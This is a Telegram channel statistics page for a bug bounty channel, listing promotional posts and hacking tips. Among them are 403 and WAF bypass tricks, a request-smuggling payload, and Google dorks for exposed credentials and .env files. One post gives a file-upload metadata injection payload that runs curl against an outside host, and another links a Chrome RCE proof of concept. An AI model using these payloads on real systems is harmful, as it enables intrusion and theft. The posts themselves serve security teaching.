ar
Feedback
Brut Security 2.0

Brut Security 2.0

الذهاب إلى القناة على Telegram

Bringing you Bug Bounty Video POCs from top hunters around the globe!

إظهار المزيد
4 514
المشتركون
-224 ساعات
+137 أيام
-130 أيام

جاري تحميل البيانات...

القنوات المماثلة
لا توجد بيانات
هل تواجه مشاكل؟ يرجى تحديث الصفحة أو الاتصال بمدير الدعم الخاص بنا.
الإشارات الواردة والصادرة
---
---
---
---
---
---
جذب المشتركين
يوليو '26
يوليو '26
+13
في 0 قنوات
يونيو '26
+29
في 1 قنوات
Get PRO
مايو '26
+30
في 0 قنوات
Get PRO
أبريل '26
+97
في 1 قنوات
Get PRO
مارس '26
+98
في 1 قنوات
Get PRO
فبراير '26
+110
في 1 قنوات
Get PRO
يناير '26
+259
في 1 قنوات
Get PRO
ديسمبر '25
+776
في 3 قنوات
Get PRO
نوفمبر '25
+60
في 0 قنوات
Get PRO
أكتوبر '25
+97
في 1 قنوات
Get PRO
سبتمبر '25
+178
في 1 قنوات
Get PRO
أغسطس '25
+130
في 0 قنوات
Get PRO
يوليو '25
+179
في 1 قنوات
Get PRO
يونيو '25
+353
في 2 قنوات
Get PRO
مايو '25
+208
في 1 قنوات
Get PRO
أبريل '25
+2 377
في 2 قنوات
التاريخ
نمو المشتركين
الإشارات
القنوات
05 يوليو+2
04 يوليو+1
03 يوليو+1
02 يوليو+6
01 يوليو+3
منشورات القناة
Repost from Brut Security
I am sharing 10 additional coupons on LinkedIn upon reaching 12,000 followers (60 remaining). 🎫📊 https://www.linkedin.com/posts/mandal-saumadip_cybersecurity-bugbounty-ethicalhacking-share-7479612184960909313-sG9F/ Please follow and like; the coupon will be available in the comments after reaching 12k followers. ⏱️💬 Thank you to everyone who participated today! 🙏

2
🔥 Just dropped — 2026 Bug Bounty Guide 📖 86 pages. 25 chapters. Built on real data. What's inside: → The AI shift — what it means for your bounties → Full recon workflow (subfinder → puredns → httpx → nuclei) → Every major vuln class with payloads — XSS, SSRF, IDOR, SSTI, SQLi, LFI, XXE → LLM & AI attack surface — prompt injection, MCP, indirect injection → WAF bypass techniques for CloudFlare, Akamai, AWS → 9 real HackerOne reports — PayPal $18,900 · Dropbox $17,576 · GitLab $12K · HackerOne $20K → Full payload cheatsheet you'll actually use mid-hunt → A-to-Z methodology checklist → Cloud security — AWS SSRF, S3, IAM escalation → Mobile app testing (Android + iOS) → Career roadmap from first VDP to private programs 🔗 https://topmate.io/saumadip/2187710 — Saumadip | Brut Security @brutsecurity
270
3
🔥 Chrome RCE PoC: CVE-2026-6307 A working renderer RCE Proof of Concept for CVE-2026-6307 — a V8 type-confusion bug (JS-to-W
🔥 Chrome RCE PoC: CVE-2026-6307 A working renderer RCE Proof of Concept for CVE-2026-6307 — a V8 type-confusion bug (JS-to-Wasm deoptimization) patched in Chrome 147.0.7727.101. ✅ Full primitives (addrof/fakeobj, out-of-cage, in-cage r/w) ✅ No-ASLR RCE that patches JIT code to pop xcalc ✅ Based on Nebula Security writeup ✅ Heavily improved with frontier LLMs + human direction (4-day experiment) This is renderer-only and still far from fully weaponized, but great for learning and research. 📥 PoC + scripts: https://github.com/0xsha/CVE-2026-6307 #Chrome #V8 #Exploit #CVE #SecurityResearch
502
4
💥TORLINK: A torrent finder that runs right from your terminal with zero setup and nothing to configure. One search checks a
💥TORLINK: A torrent finder that runs right from your terminal with zero setup and nothing to configure. One search checks a small curated list of sources at once. Pick what you want, and it downloads directly to your computer. GitHub: https://github.com/baairon/torlink
438
5
🔴 Another serious security vulnerability has been discovered in Redis 8.8.0, and no POC has been released yet for this bidir
🔴 Another serious security vulnerability has been discovered in Redis 8.8.0, and no POC has been released yet for this bidirectional RCE found by v12sec.
2 277
6
🚨 Bug Bounty Tip: Password Reset Race Condition Many applications generate a password reset token but fail to invalidate it when critical account details change. This can create a dangerous account takeover scenario. Test Flow: 1️⃣ Request a password reset for your account. 2️⃣ Do not use the reset link yet. 3️⃣ Log in normally using your current password. 4️⃣ Change your email address (or another identifier linked to password recovery). 5️⃣ Now open the old password reset link you received before the email change. 💥 Potential Finding: If the old reset token still resets the password after the email change, the application isn't invalidating previously issued reset tokens. An attacker with access to an older reset email could still take over the account even after the user updates their recovery email. What to Verify: • Is the old token still valid after changing the email? • Does the reset affect the current account owner? • Are all existing reset tokens revoked after sensitive account changes? • Does changing the password or email invalidate outstanding reset links? 🎯 Impact: High (Account Takeover) if an attacker can obtain or intercept an old password reset email. Always test only on accounts you own or are explicitly authorized to assess.
652
7
Old Days...
Old Days...
844
8
🔥 BRUT SECURITY — DAILY PENTEST DROP 🔥 "403 Forbidden" doesn't always mean forbidden. Hit a locked admin panel? Don't walk away — try these path tricks first: /admin → 403 /admin/. → 200 ✅ //admin// → 200 ✅ /./admin/./ → 200 ✅ /admin/.;/ → 200 ✅ /admin%20 → try it Servers parse paths differently than WAFs filter them. That mismatch = your way in. Bonus move: GET /anything HTTP/1.1 Host: target.com X-Original-URL: /admin Some reverse proxies trust this header blindly. 200 OK where there should've been a wall. ⚠️ Always test on scope you're authorized for. This is recon, not a free pass. 💬 Drop a like if you've ever bypassed a 403 like this in the wild. ---
874
9
☺️Your support keeps me motivated to share more valuable content! If you found this helpful, drop a like & send stars ⭐ to help me keep going. 💬 For queries, message me on Telegram: @wtf_brut 🎓 For course enrollment, reach out on WhatsApp: wa.link/brutsecurity
829
10
How to manually check for CL.TE Request Smuggling Vulnerabilities: 1️⃣ See if a GET request accepts POST 2️⃣ See if it accept
How to manually check for CL.TE Request Smuggling Vulnerabilities: 1️⃣ See if a GET request accepts POST 2️⃣ See if it accepts HTTP/1 3️⃣ Disable "Update Content-Length" 4️⃣ Send with CL & TE headers: POST / HTTP/1.1 Host: <HOST-URL> Content-Length: 6 Transfer-Encoding: chunked 0 G 5️⃣ Send request twice. If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability! Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
754
11
🚨Nobody owes you a cybersecurity job in 2026. You've done 10 courses. You have zero projects. You're wondering why no one's calling back. The industry has 4.8M+ unfilled roles globally — and you're still unemployed. That's not bad luck. That's a bad strategy. In this article we break down exactly what's broken in how beginners are approaching cybersecurity careers right now — and the 7 steps that actually get you hired in 2026: ▶️ https://brutsecurity.medium.com/nobody-owes-you-a-cybersecurity-job-in-2026-heres-how-to-earn-one-anyway-a259005275a1 No fluff. No "just get certified." Just what actually works. 🎓 Want to build the skills this article talks about? Brut Practical Web Pentesting is open for enrollment — link in bio / website. #CyberSecurity #InfoSec #CareerAdvice #PenTesting #BrutSecurity
645
12
🚨 10 coupon codes available for the Brut Offensive Playbook V1 — full Web App Bug Bounty Methodology (59 pages, 20 chapters). 🥳First 10 people to reply "PLAYBOOK" get a code. Once they're claimed, offer's closed. ❤️ https://topmate.io/saumadip/2054509
891
13
🔥Google Dork - Exposed Configs 🔍 site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | e
🔥Google Dork - Exposed Configs 🔍 site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json ©TakSec
729
14
⚡Google Dorks - Cloud Storage: site:http://s3.amazonaws.com "target[.]com" site:http://blob.core.windows.net "target[.]com" s
⚡Google Dorks - Cloud Storage: site:http://s3.amazonaws.com "target[.]com" site:http://blob.core.windows.net "target[.]com" site:http://googleapis.com "target[.]com" site:http://drive.google.com "target[.]com" 👉Find buckets and sensitive data. Combine: site:http://s3.amazonaws.com | site:http://blob.core.windows.net | site:http://googleapis.com | site:http://drive.google.com "target[.]com" Add something to narrow the results: "confidential” “privileged" “not for public release” ✅Credit- Mike Takahashi
918
15
Hey Hunter's, DarkShadow is here back again! 🖥 100 Web Vulnerabilities, categorized into various types : 😀 ⚡ Injection Vulnerabilities: 1. SQL Injection (SQLi) 2. Cross-Site Scripting (XSS) 3. Cross-Site Request Forgery (CSRF) 4. Remote Code Execution (RCE) 5. Command Injection 6. XML Injection 7. LDAP Injection 8. XPath Injection 9. HTML Injection 10. Server-Side Includes (SSI) Injection 11. OS Command Injection 12. Blind SQL Injection 13. Server-Side Template Injection (SSTI) ⚡ Broken Authentication and Session Management: 14. Session Fixation 15. Brute Force Attack 16. Session Hijacking 17. Password Cracking 18. Weak Password Storage 19. Insecure Authentication 20. Cookie Theft 21. Credential Reuse ⚡ Sensitive Data Exposure: 22. Inadequate Encryption 23. Insecure Direct Object References (IDOR) 24. Data Leakage 25. Unencrypted Data Storage 26. Missing Security Headers 27. Insecure File Handling ⚡ Security Misconfiguration: 28. Default Passwords 29. Directory Listing 30. Unprotected API Endpoints 31. Open Ports and Services 32. Improper Access Controls 33. Information Disclosure 34. Unpatched Software 35. Misconfigured CORS 36. HTTP Security Headers Misconfiguration ⚡ XML-Related Vulnerabilities: 37. XML External Entity (XXE) Injection 38. XML Entity Expansion (XEE) 39. XML Bomb ⚡ Broken Access Control: 40. Inadequate Authorization 41. Privilege Escalation 42. Insecure Direct Object References 43. Forceful Browsing 44. Missing Function-Level Access Control ⚡ Insecure Deserialization: 45. Remote Code Execution via Deserialization 46. Data Tampering 47. Object Injection ⚡ API Security Issues: 48. Insecure API Endpoints 49. API Key Exposure 50. Lack of Rate Limiting 51. Inadequate Input Validation ⚡ Insecure Communication: 52. Man-in-the-Middle (MITM) Attack 53. Insufficient Transport Layer Security 54. Insecure SSL/TLS Configuration 55. Insecure Communication Protocols ⚡ Client-Side Vulnerabilities: 56. DOM-based XSS 57. Insecure Cross-Origin Communication 58. Browser Cache Poisoning 59. Clickjacking 60. HTML5 Security Issues ⚡ Denial of Service (DoS): 61. Distributed Denial of Service (DDoS) 62. Application Layer DoS 63. Resource Exhaustion 64. Slowloris Attack 65. XML Denial of Service ⚡ Other Web Vulnerabilities: 66. Server-Side Request Forgery (SSRF) 67. HTTP Parameter Pollution (HPP) 68. Insecure Redirects and Forwards 69. File Inclusion Vulnerabilities 70. Security Header Bypass 71. Clickjacking 72. Inadequate Session Timeout 73. Insufficient Logging and Monitoring 74. Business Logic Vulnerabilities 75. API Abuse ⚡ Mobile Web Vulnerabilities: 76. Insecure Data Storage on Mobile Devices 77. Insecure Data Transmission on Mobile Devices 78. Insecure Mobile API Endpoints 79. Mobile App Reverse Engineering ⚡ IoT Web Vulnerabilities: 80. Insecure IoT Device Management 81. Weak Authentication on IoT Devices 82. IoT Device Vulnerabilities ⚡ Web of Things (WoT) Vulnerabilities: 83. Unauthorized Access to Smart Homes 84. IoT Data Privacy Issues ⚡ Authentication Bypass: 85. Insecure "Remember Me" Functionality 86. CAPTCHA Bypass ⚡ Server-Side Request Forgery (SSRF): 87. Blind SSR 88. Time-Based Blind SSRF ⚡ Content Spoofing: 89. MIME Sniffing 90. X-Content-Type-Options Bypass 91. Content Security Policy (CSP) Bypass ⚡ Business Logic Flaws: 92. Inconsistent Validation 93. Race Conditions 94. Order Processing Vulnerabilities 95. Price Manipulation 96. Account Enumeration 97. User-Based Flaws ⚡ Zero-Day Vulnerabilities: 98. Unknown Vulnerabilities 99. Unpatched Vulnerabilities 100. Day-Zero Exploits Let me know i there any vulnerability i missed?!
931
16
WAF Bypass Techniques + Tools Here are some powerful tools and methods to help you bypass Web Application Firewalls during bug hunting: ### Tools: - wafw00f — WAF fingerprinting tool → https://github.com/EnableSecurity/wafw00f - bypass-firewalls-by-DNS-history — Discover origin IPs via old DNS records → https://github.com/vincentcox/bypass-firewalls-by-DNS-history - CloudFail — Excellent for bypassing Cloudflare → https://github.com/m0rtem/CloudFail ### Effective Bypass Techniques: 1. Origin IP Discovery — Use historical DNS records (Censys, etc.) to find the real server IP and connect directly. 2. Dev/Staging Subdomains — These often don’t have WAF protection. 3. Case Variations — Try SeLeCt instead of SELECT 4. Comment Injection — SE//LECT 5. Multiple Encodings — URL → Double URL → Unicode, etc. 6. Parameter Pollution — ?id=1&id=2 7. HTTP Method Swap — Change from GET → POST → PUT 8. Content-Type Swap — Switch between form-data, JSON, XML 9. HTTP/2 Cleartext — Some WAFs only inspect HTTP/1.1 Quick WAF Detection Command: curl -I https://target.com | grep -iE "server|cdn|cf-|x-" Save this for your next bug bounty hunt! 🔥 #BugBounty #WAFBypass #BugBountyTips #Infosec
937
17
Useful Google Dorks that bug bounty hunters can leverage to find sensitive information: 👇🏻 1. Discovering Exposed Files:    - intitle:"index of" "site:target.com"    - filetype:log inurl:log site:target.com    - filetype:sql inurl:sql site:target.com    - filetype:env inurl:.env site:target.com 2. Finding Sensitive Directories:    - inurl:/phpinfo.php site:target.com    - inurl:/admin site:target.com    - inurl:/backup site:target.com    - inurl:wp- site:target.com 3. Exposed Configuration Files:    - filetype:config inurl:config site:target.com    - filetype:ini inurl:wp-config.php site:target.com    - filetype:json inurl:credentials site:target.com 4. Discovering Usernames and Passwords:    - intext:"password" filetype:log site:target.com    - intext:"username" filetype:log site:target.com    - filetype:sql "password" site:target.com 5. Finding Database Files:    - filetype:sql inurl:db site:target.com    - filetype:sql inurl:dump site:target.com    - filetype:bak inurl:db site:target.com 6. Exposed Git Repositories:    - inurl:".git" site:target.com    - inurl:"/.git/config" site:target.com    - intitle:"index of" ".git" site:target.com 7. Finding Publicly Exposed Emails:    - intext:"email" site:target.com    - inurl:"contact" intext:"@target.com" -www.target.com    - filetype:xls inurl:"email" site:target.com 8. Discovering Vulnerable Web Servers:    - intitle:"Apache2 Ubuntu Default Page: It works" site:target.com    - intitle:"Index of /" "Apache Server" site:target.com    - intitle:"Welcome to nginx" site:target.com 9. Finding API Keys:    - filetype:env "DB_PASSWORD" site:target.com    - intext:"api_key" filetype:env site:target.com    - intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com 10. Exposed Backup Files:     - filetype:bak inurl:backup site:target.com     - filetype:bak inurl:backup site:target.com     - filetype:zip inurl:backup site:target.com     - filetype:tgz inurl:backup site:target.com Replace target.com with the domain or target you are focusing on. #GoogleDorks #BugHunting #OSINT
968
18
📌Bug Bounty Tip: Finding Confidential Documents Fast ✅Admins often leave these unredacted files online by mistake, making th
📌Bug Bounty Tip: Finding Confidential Documents Fast ✅Admins often leave these unredacted files online by mistake, making them a high-medium severity finding for bug bounty programs.
1 190
19
🔥 Bug Bounty Tip: Simple Auth Bypass = Easy Wins Many devs focus on fancy front-end protections while leaving the backend wide open. Quick checks that pay off: 1. Direct Admin Access Try /admin, /dashboard, /panel, /cp without logging in. Often no redirect or proper auth check. 2. 2FA Bypass - Skip the 2FA step by modifying the request (remove 2fa param or set to true). - Replay the login request after the first successful step. - Try ?bypass=1 or similar hidden params. 3. Password Reset Token Leak Check if the reset token appears in the JSON response, page source, or confirmation email before the user clicks the link. Pro tip: These "dumb" bugs are way more common than complex exploits and often lead to critical severity + good bounties. Test them early in every program.
1 115
20
Hey Hunter's, DarkShadow is here back again! file upload extension bypass for RCE ❌ metadata injection for RCE ✅ File upload+1
Hey Hunter's, DarkShadow is here back again! file upload extension bypass for RCE ❌ metadata injection for RCE ✅ File upload vulnerability not just bypassing extension, metadata can be exploited. you can try like: {"Title\n-if\nsystem('curl burplink)||1\n-Comment":"x"} guy's if you really love to read then show your love and react❤️ and don't forget to follow me x.com/darkshadow2bd #bugbounty #bugbountytips #rce
1 366